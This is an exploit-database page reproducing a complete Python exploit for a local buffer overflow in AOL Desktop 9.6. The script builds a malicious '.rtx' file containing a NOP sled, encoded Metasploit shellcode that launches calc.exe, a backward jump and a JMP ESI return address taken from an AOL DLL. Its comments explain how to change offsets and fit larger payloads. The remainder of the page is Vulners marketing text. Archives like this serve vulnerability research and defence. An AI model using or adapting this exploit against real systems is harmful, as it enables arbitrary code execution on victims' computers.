Vulners
Lucene search
AOL Desktop 9.6 - '.rtx' Local Buffer Overflow
#!/usr/bin/python
# Vulnerable app: AOL Desktop 9.6
# Author: sickness
# Download : http://daol.aol.com/software/aoldesktop96/
# kudos to sup3r: http://www.exploit-db.com/exploits/16085/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE : 02/02/2011
# NOTE: If exploit doesn't work turn AOL off (CTRL+ALT+DELETE and turn all AOL processes off) then try again
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# You might need to change the offset.
# If you want a payload larger than 400 bytes, then you need to increase the negative jump
# Watch out for other bad chars !!
# Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e
###################################################################
# First Header
hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
"\x68\x74\x74\x70\x3a\x2f\x2f")
# Second Header
hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
"\x48\x54\x4d\x4c\x3e\x0d\x0a")
payload='\x90'* 4968 # 5368 until EIP overwrite - 400 bytes from the negative jump.
payload += '\x90'*16 # Some nops
# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x31\x90\x3e' -t c
payload +=("\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22"
"\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03"
"\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16"
"\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed"
"\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72"
"\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16"
"\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e"
"\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b"
"\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66"
"\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05"
"\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1"
"\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02"
"\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d"
"\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a")
payload += '\x90'*(5368-len(payload))
payload += '\xe9\x70\xfe\xff\xff' # Jump back 400 bytes
payload += '\x90'*11
payload += '\xC0\xCF\xC5\x20' # Universal JMP ESI from [aolusershell.dll]
payload += '\x90'*(6000-len(payload))
exploit = hd1+payload+hd2
try:
file=open('exploit.rtx','w')
file.write(exploit)
file.close()
print 'File created, time to PEW PEW!\n'
except:
print 'Something went wrong!\n'
print 'Check if you have permisions to write in that folder, of if the folder exists!'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Feb 2011 00:00Current
7.4High risk
Vulners AI Score7.4